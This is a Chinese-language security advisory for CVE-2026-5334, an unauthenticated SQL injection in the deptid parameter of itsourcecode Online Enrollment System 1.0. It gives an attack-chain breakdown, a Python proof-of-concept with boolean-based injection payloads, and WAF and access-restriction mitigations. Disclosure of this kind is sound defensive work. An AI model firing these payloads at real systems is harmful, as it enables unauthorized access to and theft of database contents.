CVE-2026-5334: Online Enrollment System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5334

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Enrollment System

漏洞概述

itsourcecode Online Enrollment System 1.0版本中存在高危SQL注入漏洞。该漏洞位于/enrollment/index.php文件的参数处理组件中，由于未对用户输入的deptid参数进行严格的过滤和验证，导致攻击者可以构造恶意SQL语句。攻击者无需认证即可远程利用此漏洞，可能导致数据库敏感信息泄露、数据被篡改或删除，对系统机密性、完整性和可用性造成影响。

技术细节

该漏洞的根本原因在于itsourcecode Online Enrollment System 1.0在处理编辑功能请求时存在输入验证缺失。具体受影响的文件路径为/enrollment/index.php?view=edit&id=3。后端代码在接收'deptid'参数时，直接将其拼接到SQL查询语句中执行，未使用参数化查询或预编译语句。

由于CVSS向量为AV:N/AC:L/PR:N/UI:N，这表明该漏洞极易被利用。攻击者无需任何用户权限或交互，仅需向服务器发送特制的HTTP GET或POST请求。通过在deptid参数中注入SQL元字符（如单引号、注释符）以及UNION SELECT语句，攻击者可以绕过前端逻辑，直接操纵后端数据库。利用成功后，攻击者可提取数据库中的结构化数据（如管理员账号密码）、修改表数据或破坏数据库服务。鉴于目前已有公开的PoC代码，该风险处于极高状态。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用itsourcecode Online Enrollment System 1.0，并确认其/enrollment/index.php接口对外开放。

STEP 2

武器化

攻击者针对deptid参数构造特定的SQL注入Payload（例如：基于UNION的查询或布尔盲注语句），用于提取数据库信息。

STEP 3

交付

攻击者通过HTTP协议向目标服务器发送包含恶意Payload的请求（GET/POST），无需身份验证即可触达漏洞点。

STEP 4

利用

后端数据库接收到未经过滤的参数，直接执行攻击者注入的恶意SQL命令，导致查询逻辑被篡改。

STEP 5

达成目标

攻击者成功获取敏感数据（如用户凭据）、篡改数据库内容或导致服务不可用，造成机密性、完整性或可用性损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Proof of Concept for CVE-2026-5334
# Target: itsourcecode Online Enrollment System 1.0
def check_sqli(target_url):
    # Vulnerable endpoint
    url = f"{target_url}/enrollment/index.php"
    
    # Payload to test SQL Injection in 'deptid' parameter
    # Using a simple boolean-based sqli payload
    payload = {
        "view": "edit",
        "id": "3",
        "deptid": "1' AND 1=1-- -"
    }
    
    try:
        response = requests.get(url, params=payload, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {url}")
            print(f"[*] Payload: {payload}")
            print(f"[*] Response Length: {len(response.text)}")
            
            # Compare with a false condition to confirm vulnerability (Logic analysis required)
            payload_false = {
                "view": "edit",
                "id": "3",
                "deptid": "1' AND 1=2-- -"
            }
            response_false = requests.get(url, params=payload_false, timeout=5)
            
            if response.text != response_false.text:
                print("[!] Potential SQL Injection vulnerability detected!")
            else:
                print("[-] Vulnerability not confirmed via simple response comparison.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    check_sqli(target)

影响范围

itsourcecode Online Enrollment System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议通过Web应用防火墙（WAF）添加规则，拦截针对"/enrollment/index.php"路径中"deptid"参数的SQL注入特征（如单引号、UNION、SELECT等关键字）。同时，建议暂时关闭该系统的公网访问或限制仅内网IP访问，以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5334
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5334
3 Details https://www.cvedetails.com/cve/CVE-2026-5334/
4 VulDB https://vuldb.com/cve/CVE-2026-5334
5 Link https://github.com/yuji0903/silver-guide/issues/15
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/781119
8 Link https://vuldb.com/vuln/354668
9 Link https://vuldb.com/vuln/354668/cti